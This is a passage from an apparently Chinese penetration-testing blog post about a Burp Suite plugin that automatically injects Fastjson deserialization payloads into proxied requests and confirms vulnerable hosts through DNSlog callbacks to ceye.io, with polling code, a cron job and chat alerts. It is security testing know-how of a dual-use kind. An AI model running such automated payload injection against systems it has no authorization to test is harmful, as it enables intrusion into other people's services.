<figure class="highlight llvm"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">curl http://<span class="keyword">x</span>.<span class="keyword">x</span>.<span class="keyword">x</span>.<span class="keyword">x</span>:<span class="number">8090</span> -<span class="keyword">x</span> http://<span class="number">127.0</span>.<span class="number">0.1</span>:<span class="number">8080</span> -H <span class="string">"Content-Type: application/json"</span> --data '&#123;<span class="string">"name"</span>:<span class="string">"hello"</span>, <span class="string">"age"</span>:<span class="number">30</span>&#125;'</div></pre></td></tr></table></figure>
<p>由于插件是自动的，同时也没有编写界面，可以使用logger++查看。</p>
<p><img src="http://blog.w2n1ck.com/fastjson_request.png" alt=""></p>
<p>从上图可以看大片序号33是代理的流量，由于符合规则，所以紧接着就调用了我们编写的插件，并自动填充payload并发送</p>
<p><img src="http://blog.w2n1ck.com/fastjson_result.png" alt=""></p>
<p>在dnslog中成功查看到攻击请求</p>
<p><img src="http://blog.w2n1ck.com/fastjson_ceye.png" alt=""></p>
<h3 id="0x04-漏洞告警"><a href="#0x04-漏洞告警" class="headerlink" title="0x04 漏洞告警"></a>0x04 漏洞告警</h3><p>所有的payload可使用dnslog进行，并利用对应的API来获取数据，我这里使用的ceye.io，也可以自己用开源的<a href="https://github.com/opensec-cn/vtest" target="_blank" rel="external">vtest</a>等自己搭建一套。</p>
<h4 id="4-1-获取接口数据"><a href="#4-1-获取接口数据" class="headerlink" title="4.1 获取接口数据"></a>4.1 获取接口数据</h4><p>为了准确，在payload中设置了随机字符。使用API获取数据</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">_ceye_url = <span class="string">"http://api.ceye.io:80/v1/records?token=xxx&amp;type=&#123;&#125;&amp;filter="</span></div><div class="line">ceye_headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Accept-Encoding"</span>: <span class="string">"gzip, deflate"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>&#125;</div><div class="line">query_type = [<span class="string">'http'</span>,<span class="string">'dns'</span>]</div><div class="line"><span class="keyword">for</span> _type <span class="keyword">in</span> query_type:</div><div class="line">    ceye_url = _ceye_url.format(_type)</div><div class="line">    con = requests.get(ceye_url, headers=ceye_headers, timeout=<span class="number">30</span>)</div><div class="line">    status_code = con.status_code</div><div class="line">    _content = json.loads(con.content)</div><div class="line">    <span class="keyword">if</span> status_code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">"ceye.io"</span> <span class="keyword">in</span> str(_content) <span class="keyword">and</span> randomStr <span class="keyword">in</span> str(_content):</div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(len(_content[<span class="string">'data'</span>])):</div><div class="line">            ip = _content[<span class="string">'data'</span>][i][<span class="string">'remote_addr'</span>]</div><div class="line">            <span class="keyword">if</span> ip <span class="keyword">not</span> <span class="keyword">in</span> all_ip_list:</div><div class="line">                <span class="comment"># print(ip, all_ip_list)</span></div><div class="line">                all_ip_list.append(ip)</div></pre></td></tr></table></figure>
<h4 id="4-2-定时任务"><a href="#4-2-定时任务" class="headerlink" title="4.2 定时任务"></a>4.2 定时任务</h4><p>做个定时任务轮询获取</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">[root@Centos ~]# cd /var/spool/cron/</div><div class="line">[root@Centos cron]# cat root </div><div class="line">*/10 * * * * /usr/bin/python /root/ceye_monior/ceye_monior.py</div></pre></td></tr></table></figure>
<h4 id="4-3-漏洞推送"><a href="#4-3-漏洞推送" class="headerlink" title="4.3 漏洞推送"></a>4.3 漏洞推送</h4><p>漏洞推送可以结合各种机器人，比如钉钉、企业微信、TG等，这里我用了别人直接开发好的微信推送：<a href="http://sc.ftqq.com/" target="_blank" rel="external">Server酱</a></p>
<p><img src="http://blog.w2n1ck.com/fastjson_server1.png" alt=""></p>
<p>他这个服务有个存储型XSS，作者给修成了这个吊样。。。</p>
<p>点进去之后即可查看详情了</p>
<p><img src="http://blog.w2n1ck.com/fastjson_server2.png" alt=""></p>
<h3 id="0x05-扩展"><a href="#0x05-扩展" class="headerlink" title="0x05 扩展"></a>0x05 扩展</h3><p>Fastjson的payload很多，可以自己写个列表循环执行下即可，Jackson同理。</p>
<p>另外，XXE、SSRF等都可以利用此方法实现，搜了下，GitHub已经有代码了：<a href="https://github.com/yandex/burp-molly-pack/，照着代码根据自己需求改下就好了。" target="_blank" rel="external">https://github.com/yandex/burp-molly-pack/，照着代码根据自己需求改下就好了。</a></p>
<p>用着非常舒服，再扩展扩展，还要什么PassiveScan，要什么扫描器，要什么自行车~</p>
<h4 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h4><p><a href="https://cloud.tencent.com/developer/article/1166490" target="_blank" rel="external">https://cloud.tencent.com/developer/article/1166490</a></p>
<p><a href="https://forum.portswigger.net/thread/scanner-vs-processhttpmessage-python-ef82b3ef" target="_blank" rel="external">https://forum.portswigger.net/thread/scanner-vs-processhttpmessage-python-ef82b3ef</a></p>
<p><a href="https://github.com/yandex/burp-molly-pack/" target="_blank" rel="external">https://github.com/yandex/burp-molly-pack/</a></p>
<p><a href="https://xz.aliyun.com/t/7065" target="_blank" rel="external">https://xz.aliyun.com/t/7065</a></p>
<p><a href="https://portswigger.net/burp/extender/api/" target="_blank" rel="external">https://portswigger.net/burp/extender/api/</a></p>
<p><img src="http://blog.w2n1ck.com/w2n1ck-code.gif" alt=""></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>大爷，赏个铜板呗！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/weixin.png" alt="瓦都剋 WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/zhifubao.png" alt="瓦都剋 Alipay"/>
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      瓦都剋
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/" title="BurpSuite插件开发之Fastjson自动化检测">http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/渗透测试/" rel="tag"><i class="fa fa-tag"></i> 渗透测试</a>
          
            <a href="/tags/BurpSuite/" rel="tag"><i class="fa fa-tag"></i> BurpSuite</a>
          
            <a href="/tags/Fastjson/" rel="tag"><i class="fa fa-tag"></i> Fastjson</a>
          
            <a href="/tags/被动扫描/" rel="tag"><i class="fa fa-tag"></i> 被动扫描</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/02/07/C:S客户端测试笔记/" rel="next" title="PC(C/S架构)客户端测试笔记">
                <i class="fa fa-chevron-left"></i> PC(C/S架构)客户端测试笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/06/渗透测试之API技巧/" rel="prev" title="渗透测试之API测试技巧">
                渗透测试之API测试技巧 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="瓦都剋" />
          <p class="site-author-name" itemprop="name">瓦都剋</p>
           
              <p class="site-description motion-element" itemprop="description">Looking at yourself from a different Angle!</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">117</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">109</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/w2n1ck" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://github.com/w2n1ck" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Github
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://vulwiki.readthedocs.io/" target="_blank" title="Zhihu">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Zhihu
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://wkh.dropsec.xyz" title="王小洪" target="_blank">王小洪</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://fgp.dropsec.xyz" title="冯小鹏" target="_blank">冯小鹏</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.neargle.com/" title="周小斌" target="_blank">周小斌</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://am4zing.me/" title="王小岩" target="_blank">王小岩</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yangge.me/" title="杨大成" target="_blank">杨大成</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dropsec.xyz/" title="团队主页" target="_blank">团队主页</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://vulwiki.readthedocs.io/" title="漏洞知识库" target="_blank">漏洞知识库</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.w2n1ck.com/" title="新博客" target="_blank">新博客</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-Fastjson反序列化漏洞"><span class="nav-number">2.</span> <span class="nav-text">0x01 Fastjson反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#简介"><span class="nav-number">2.0.1.</span> <span class="nav-text">简介</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-插件中用到的类和方法"><span class="nav-number">3.</span> <span class="nav-text">0x02 插件中用到的类和方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#2-1-IBurpExtender"><span class="nav-number">3.1.</span> <span class="nav-text">2.1 IBurpExtender</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-2-IHttpListener"><span class="nav-number">3.2.</span> <span class="nav-text">2.2 IHttpListener</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-3-registerExtenderCallbacks"><span class="nav-number">3.3.</span> <span class="nav-text">2.3 registerExtenderCallbacks</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-4-processHttpMessage"><span class="nav-number">3.4.</span> <span class="nav-text">2.4 processHttpMessage</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-代码实现"><span class="nav-number">4.</span> <span class="nav-text">0x03 代码实现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-漏洞检测"><span class="nav-number">5.</span> <span class="nav-text">0x04 漏洞检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-漏洞告警"><span class="nav-number">6.</span> <span class="nav-text">0x04 漏洞告警</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#4-1-获取接口数据"><span class="nav-number">6.1.</span> <span class="nav-text">4.1 获取接口数据</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-2-定时任务"><span class="nav-number">6.2.</span> <span class="nav-text">4.2 定时任务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-3-漏洞推送"><span class="nav-number">6.3.</span> <span class="nav-text">4.3 漏洞推送</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-扩展"><span class="nav-number">7.</span> <span class="nav-text">0x05 扩展</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#参考文章："><span class="nav-number">7.1.</span> <span class="nav-text">参考文章：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-linkedin"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">瓦都剋</span>
</div>



        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://mydisqus-2.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://byd.dropsec.xyz/2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/';
          this.page.identifier = '2020/03/05/BurpSuite插件开发之自动化Fastjson扫描/';
          this.page.title = 'BurpSuite插件开发之Fastjson自动化检测';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://mydisqus-2.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  








  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

<script type="text/javascript" color="0,0,0" opacity='0.7' zIndex="-2" count="20" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
